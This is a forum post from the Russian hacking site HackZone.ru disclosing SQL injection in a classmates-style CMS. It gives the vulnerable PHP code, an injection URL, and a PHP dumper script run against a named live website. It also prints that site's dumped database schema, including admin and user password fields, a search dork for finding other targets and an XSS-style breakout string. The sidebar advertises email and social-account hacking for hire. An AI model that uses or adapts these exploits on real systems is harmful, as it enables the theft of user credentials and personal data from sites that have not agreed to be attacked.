Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Уязвимости CMS ClassMates Актуальные базы 2GIS в форматах CSV,Excel,SQL
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Взлом и безопасность / WEB сайтов RSS подписка на сообщения с форума Subscribe Модераторы: RenGO, Bb0y, B3JIoMep, BRUNOTTI, Virous, xssmailcom
Технологии взлома сайтов - xss, sql injection. Для сообщений "взломайте мне сайт" есть форум "Предложения работы".

Новая тема Наиболее обсуждаемые темы Наиболее посещаемые темы
Поиск 
Период
Перейти

Просмотров - 4214
Уязвимости CMS ClassMates
Добавить этот топик в закладки »
RSS-лента ответов »Subscribe
M.W.N.N.


Gold Member
# | Сообщение добавлено 31.10.2010 19:15:01
CMS ClassMates
 
SQL inj
 
reg2.php
Text

...
<?php include("regcontent02.php");?>
...
 

regcontent02.php
Text

...
<?php
$idR = $_GET['idR'];
$idCi = $_GET['idCi'];
$idC = $_GET['idC'];
 
$send_search = $_POST['send_search'];
$search = $_POST['search'];
 
$add = $_GET['add'];
$add_ch = $_SESSION['REGSCHOOL_OK'];
if(isset($_SESSION['REGSHCOOL_OK'])) unset($_SESSION['REGSCHOOL_OK']);
 
$query = "select countries from $countries where id='$idC'";
$r = mysql_query($query) or die("Ошибка при подключении к базе данных");
$row0 = mysql_fetch_row($r);
 
$query = "select regions from $regions where id='$idR' and countryId='$idC'";
$r = mysql_query($query) or die("Ошибка при подключении к базе данных");
$row = mysql_fetch_row($r);
 
$query = "select city from $city where id='$idCi' and regionId='$idR' and countryId='$idC'";
$r = mysql_query($query) or die("Ошибка при подключении к базе данных");
$row1 = mysql_fetch_row($r);
?>
...
 

Сплоит:
Text
reg2.php?idC=1&idR=13&idCi=15'+and+1=1+union+select+version()+limit+1,1--+

Дампер:
Text

<?php
$url="http://privatodnoklassniki.com/reg/reg2.php?idC=1&idR=45&idCi=7'+and+1=1+union+select";
$vir="table_schema,table_name,column_name";
$vir_1="+concat_ws(0x3a,CHAR(104,97,99,107),".$vir.",CHAR(104,97,99,107))+from+information_schema.columns";
$regular="|hack(.*)hack|Uis";
$text[0]="";
$text[1]="hack:";
$text[2]=":hack";
        $url=$url.$vir_1;
        for($i=1;$i<10000;$i++){
                //for($i=178;$i<10000;$i++){
        $rn=$url."+limit+$i,1--+";
                $fp=file_get_contents($rn);
        preg_match($regular,$fp,$matches);
        $result_2=str_replace($text[1],$text[0],$matches[0]);
        $result_3=str_replace($text[2],$text[0],$result_2);
        if($result_3==""){exit();
        }
        echo $result_3."\n";
        }
?>
 

Структура БД.
Text

pautina:admins:id
pautina:admins:login
pautina:admins:password
pautina:admins:family
pautina:admins:name
pautina:admins:petr
pautina:admins:status
pautina:admins:uid
pautina:army:id
pautina:army:userId
pautina:army:armyYear
pautina:army:armyNum
pautina:army:armyClass
pautina:army:armyCountry
pautina:army:armyRegion
pautina:army:armyCity
pautina:army:armyYearIn
pautina:armynum:id
pautina:armynum:armyNum
pautina:armynum:countryId
pautina:armynum:regionId
pautina:armynum:cityId
pautina:armynum:address
pautina:blacklist:id
pautina:blacklist:userId
pautina:blacklist:userIdBlack
pautina:blacklist:time
pautina:city:id
pautina:city:city
pautina:city:countryId
pautina:city:regionId
pautina:coast:id
pautina:coast:num
pautina:coast:oper
pautina:coast:sum1
pautina:coast:sum2
pautina:college:id
pautina:college:userId
pautina:college:collegeYear
pautina:college:collegeNum
pautina:college:collegeClass
pautina:college:collegeCountry
pautina:college:collegeRegion
pautina:college:collegeCity
pautina:college:collegeYearIn
pautina:collegenum:id
pautina:collegenum:collegeNum
pautina:collegenum:countryId
pautina:collegenum:regionId
pautina:collegenum:cityId
pautina:collegenum:address
pautina:company:id
pautina:company:userId
pautina:company:companyYear
pautina:company:companyNum
pautina:company:companyClass
pautina:company:companyCountry
pautina:company:companyRegion
pautina:company:companyCity
pautina:company:companyYearIn
pautina:companynum:id
pautina:companynum:companyNum
pautina:companynum:countryId
pautina:companynum:regionId
pautina:companynum:cityId
pautina:companynum:address
pautina:countries:id
pautina:countries:countries
pautina:forum:id
pautina:forum:forum
pautina:forum:userId
pautina:forum:fromUser
pautina:forum:time
pautina:friends:id
pautina:friends:userId
pautina:friends:friendId
pautina:info:id
pautina:info:info
pautina:info:toUser
pautina:info:fromUser
pautina:info:time
pautina:info:message
pautina:invite:id
pautina:invite:invite
pautina:marks:id
pautina:marks:photoId
pautina:marks:userPhotoId
pautina:marks:userId
pautina:marks:mark
pautina:marks:time
pautina:messanges:id
pautina:messanges:messanges
pautina:messanges:fromUser
pautina:messanges:toUser
pautina:messanges:time
pautina:messanges1:id
pautina:messanges1:messanges
pautina:messanges1:toUser
pautina:messanges1:fromUser
pautina:messanges1:time
pautina:messangesa:id
pautina:messangesa:fromUser
pautina:messangesa:toUser
pautina:messangesa:theme
pautina:messangesa:messanges
pautina:messangesa:time
pautina:messangesa:status
pautina:photos:id
pautina:photos:photos
pautina:photos:userId
pautina:photos:first
pautina:photos:description
pautina:photos:addDate
pautina:regions:id
pautina:regions:regions
pautina:regions:countryId
pautina:school:id
pautina:school:userId
pautina:school:schoolYear
pautina:school:schoolNum
pautina:school:schoolClass
pautina:school:schoolCountry
pautina:school:schoolRegion
pautina:school:schoolCity
pautina:school:schoolYearIn
pautina:schoolnum:id
pautina:schoolnum:schoolNum
pautina:schoolnum:countryId
pautina:schoolnum:regionId
pautina:schoolnum:cityId
pautina:schoolnum:address
pautina:univer:id
pautina:univer:userId
pautina:univer:univerYear
pautina:univer:univerNum
pautina:univer:univerClass
pautina:univer:univerCountry
pautina:univer:univerRegion
pautina:univer:univerCity
pautina:univer:univerYearIn
pautina:univernum:id
pautina:univernum:univerNum
pautina:univernum:countryId
pautina:univernum:regionId
pautina:univernum:cityId
pautina:univernum:address
pautina:users:id
pautina:users:email
pautina:users:password
pautina:users:name
pautina:users:family
pautina:users:sex
pautina:users:age
pautina:users:lastVisit
pautina:users:country
pautina:users:city
pautina:users:about
pautina:users:online
pautina:users:regTime
pautina:users:miPass
pautina:users:active
pautina:users:uid
pautina:users:aboutS
pautina:users:aboutM
pautina:users:aboutW
pautina:users:aboutD
pautina:users:orientation
pautina:usersrecover:id
pautina:usersrecover:email
pautina:usersrecover:pass
pautina:visit:id
pautina:visit:userId
pautina:visit:visitId
pautina:visit:time
 

 
Адрес админки: localhost/admin/
Дорк: inurl:reg/reg2.php
 
Пример:
Админ не счел нужным ответить, так что выкладываю, прикольно было увидеть то что лежит рядом на этом серваке ;)
Text
http://privatodnoklassniki.com/reg/reg2.php?idC=1&idR=45&idCi=7%27+and+1=1+union+select+version%28%29+limit+1,1--+

 
blackhack.ru [195.3.145.24]
hackers-street.ru [195.3.145.24]
privatodnoklassniki.com [195.3.145.24]
##################################################
Не увидел что бы еще где то выклыдывалось, но если баян то извините
 
javascript:/*--&gt;&lt;/marquee&gt;&lt;/script&gt;&lt;/title&gt;&lt;/textarea&gt;&lt;/noscript&gt;&lt;/style&gt;&lt;/xmp&gt;&quot;&gt;
Сказать спасибо Ответить Цитировать


Только зарегистрированные пользователи могут оставлять сообщения в форуме

Зарегистрироваться *** Авторизоваться

 Последние новости и статьи  Последние сообщения с форумов
  • Самозащита от вируса Petya
  • Google Pixel взломали за 60 секунд
  • В CMS Joomla обнаружена критическая 0-day уязвимость
  • ФБР не смогло взломать протокол шифрования переписки террористов ...
  • Полиция обыскала дом предполагаемого создателя платежной системы ...
  • Google: квантовый ПК будет в 100 млн раз быстрее стандартных чипо...
  • "Лаборатория Касперского" констатирует усиление атак кибергруппир...
  • Microsoft Edge откроет исходные коды ChakraCore
  • Anonymous объявили 11 декабря «днём троллинга» ИГИЛ
  • Миллионы телевизоров, смартфонов и маршрутизаторов оказались уязв...

    Все новости... Все статьи... Прислать новость RSS
  • Разное / Ищу работу » Re: взлом почты на майле
  • Разное / Ищу работу » Re: Взлом емейлов, вконтакте, одноклассники
  • Разное / Ищу работу » Re: Взлом почты mail.ru, yandex.ru, rambler, gmail
  • Разное / Ищу работу » Re: Качественный подбор паролей к почтам. Работаем с 2011 го...
  • Разное / Ищу работу » Re: Взлом ВКонтакте на заказ. Взлом почты на заказ.
  • Интернет / Разное » SOCKS 4/5, HTTPS прокси сервис - proxybuy
  • Программирование / WEB Design » Уроки по JavaScript для начинающих
  • Разное / Ищу работу » Re: Прогон 7ым XRumerоm по форумам, блогам, гостевым. ru и e...
  • Разное / Ищу работу » Re: взлом почты на майле
  • Разное / Предложения работы » Нужен способ заработка, майнинга

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 2007-2012. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    Ya-Cyt службы мониторинга серверов

    #{title}

    #{text}

    x

    #{title}

    #{text}